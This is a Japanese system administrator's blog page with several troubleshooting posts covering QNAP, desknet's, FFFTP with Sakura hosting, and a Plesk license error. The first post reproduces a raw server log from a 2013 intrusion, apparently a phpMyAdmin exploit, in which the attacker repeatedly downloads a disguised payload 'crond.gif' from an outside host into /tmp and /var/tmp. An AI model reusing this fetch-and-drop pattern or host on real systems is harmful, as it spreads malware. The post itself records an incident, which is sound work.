技術:2012年

2016年03月26日

昔の記事なのですが、公開されていなかったので、メモ。

本件のログですがおそらく、phpmyadmin の脆弱性を突いた攻撃だと思われます。
※詳細は当時のことなのでよく覚えていませんが・・・


no crontab for apache
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove directory `/tmp/.ICE-unix': Operation not permitted
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
--2013-01-07 20:14:20-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `crond.gif'

0K .......... ..... 100% 23.0K=0.7s

2013-01-07 20:14:22 (23.0 KB/s) - `crond.gif' saved [15620/15620]

% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
^M 0 15620 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0^M100 15620 100 15620 0 0 11675 0 0:00:01 0:00:01 --:--:-- 23348
sh: fetch: command not found
sh: lynx: command not found
--2013-01-07 20:14:25-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `/tmp/but.gif'

0K .......... ..... 100% 22.9K=0.7s

2013-01-07 20:14:26 (22.9 KB/s) - `/tmp/but.gif' saved [15620/15620]

--2013-01-07 20:14:26-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `crond.gif'

0K .......... ..... 100% 22.7K=0.7s

2013-01-07 20:14:28 (22.7 KB/s) - `crond.gif' saved [15620/15620]

% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
^M 8 15620 8 1448 0 0 2133 0 0:00:07 --:--:-- 0:00:07 2133^M100 15620 100 15620 0 0 11550 0 0:00:01 0:00:01 --:--:-- 21057
sh: lynx: command not found
--2013-01-07 20:14:31-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `/var/tmp/crond.gif'

0K .......... ..... 100% 22.6K=0.7s

2013-01-07 20:14:32 (22.6 KB/s) - `/var/tmp/crond.gif' saved [15620/15620]



stock_value at 13:15|この記事のURLComments(0)TrackBack(0)

2012年12月27日

僕は比較的 QNAP を選定することが多くあります。
しかしQNAPではまだフェイルオーバーができません。

第433回:フェイルオーバー&RAID6でデータをしっかり保護バッファロー「TeraStation PRO TS-QVH4.0TL/R6」

上記記事を読むと、障害発生から5分で切り替わったと言うことでした。
ちょっと時間がかかりすぎるような気がするのは確かですが、すぐに伺ってトラブル対応ができない場合、たった5分のダウンタイムになるというのは大きな意味を持つように思います。

まだ使ったことが無いのですが、何かのタイミングで検証できそうなら試してみたいと思います。

stock_value at 17:43|この記事のURLComments(0)TrackBack(0)

2012年12月25日

デスクネッツのログを検索しようとすると、過去の集計がされていません。そして設定画面では、赤字で以下の通り表示されていました。

---
アクセスログ集計バッチが以下の理由により停止しました。
データベースの接続に失敗しました。データベースが起動していない可能性があります。
---

昔にデスクネッツのログフォルダを変更しました。その際、既存のフォルダにあったログファイル [acclogging_20XXXXXX_20XXXXXX] もすべて新しいフォルダに移動させました。

しかしどうやらこのときに、acclogging_base.db というファイルも移動してしまったようなのです。

今回のトラブルでわかったことは、acclogging_base.db は移動前フォルダの中身を参照しているような感じがしました。
ProcessMonitor で デスクネッツのログを制御していると思われるプロセス、dndbacclogging.exe を確認したところ、この base ファイルを読み込もうとしてエラーになっていました。

幸いな事にログの取得は過去にさかのぼって保管されていたので、正しい位置にファイルを戻したところ、集計を行ってくれました。

stock_value at 17:08|この記事のURLComments(0)TrackBack(0)

2012年12月23日

FFFTPを利用して、さくらインターネットの共有サーバーに接続します。※細かいプラン名はよくわかりません。

この契約形態のサーバーは、MTなどの比較的多数のファイルをダウン・アップしようとすると、接続が切れてしまうようです。
僕がやったわけでは無いので詳細は分かりませんが、部下に「ちょっとずつじゃないとエラーになってできません」そのように言われました。

調べてみると、FFFTP との相性なのか、切断されてしまったり、フリーズ状態になったりするという症状が出る場合があるようです。
さくらが悪いのかFFFTPが悪いのか
さくらちゃん(※ レンタルサーバ)とFTPソフトの相性

ライト以外のプランであれば、シェルログインができるようです。
上記サイトにあるように、SCPを利用したほうが安定するのかもしれません。

stock_value at 19:47|この記事のURLComments(0)TrackBack(0)

2012年12月20日

QNAPで警告的なログが出た場合に、メールで送信するように設定しています。
その際に、比較的よく送られてくるログが以下の内容になります。

The system was not shut down properly last time.

そのままですが、シャットダウンの際に適切に行われなかったと言うことです。

僕の管理している環境では、法定点検による停電の際や、作業の時にコンセントを抜くことによって電源をOFFにする場合もあり、仕方が無いことなのかと思っています。

stock_value at 09:51|この記事のURLComments(0)TrackBack(0)

2012年12月19日

Plesk を利用していたら、ある日突然ライセンスのアップデートができなくなりました。
Plesk のライセンス管理から、キーの取得を行うと以下の通りエラーが。

-----------------------
ERROR: PleskFatalException

Unknown key property: concerto
0: common_func.php3:93
psaerror(string 'Unknown key property: concerto')
1: common_func.php3:4831
getKeyProp(string 'concerto')
2: key_update.php:16
-----------------------

調べてみると、Plesk のライセンスは 5224 を利用するようです。ファイアーウォールでふさがっていたようなので、開放しました。

stock_value at 16:51|この記事のURLComments(0)TrackBack(0)